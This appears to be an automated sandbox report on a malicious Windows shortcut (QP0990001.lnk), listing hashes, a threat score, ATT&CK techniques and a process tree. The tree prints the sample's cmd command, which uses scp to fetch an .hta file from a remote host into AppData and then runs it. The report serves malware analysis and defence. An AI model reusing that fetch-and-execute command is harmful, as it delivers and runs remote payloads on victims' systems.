d6d581d3f057f38909f94459869b269fd099025f3e1714a7bb733ef888623391

Analysis

max time kernel
122s
max time network
125s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
03-10-2023 09:57

Target

QP0990001.lnk
Size

2KB
MD5

c23a4b2e392af2535198428aafcbc7a4
SHA1

02a472fb5f6be33044c51420b6fa98fe3adf6251
SHA256

81b9e6ecd9d94421b7bef50c53e109e15927b3fdfb5068f51a742b662a7deaad
SHA512

17172ade2ef629d2b878635015a6bcbc73464737b51fc7312b1b6ffc76ea238a568bae3f479c8e2f5ef775404681d731c8217cdb6249fad8a5db98902ea00747

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

cmd.exe

description	pid	process	target process
PID 2972 wrote to memory of 2220	2972	cmd.exe	cmd.exe
PID 2972 wrote to memory of 2220	2972	cmd.exe	cmd.exe
PID 2972 wrote to memory of 2220	2972	cmd.exe	cmd.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\QP0990001.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2972

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "scp -o StrictHostKeyChecking=no [email protected]:/aa/DZZ C:\Users\Admin\AppData\Roaming\eeMT.hta" & C:\Users\Admin\AppData\Roaming\eeMT.hta
2⤵
PID:2220

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact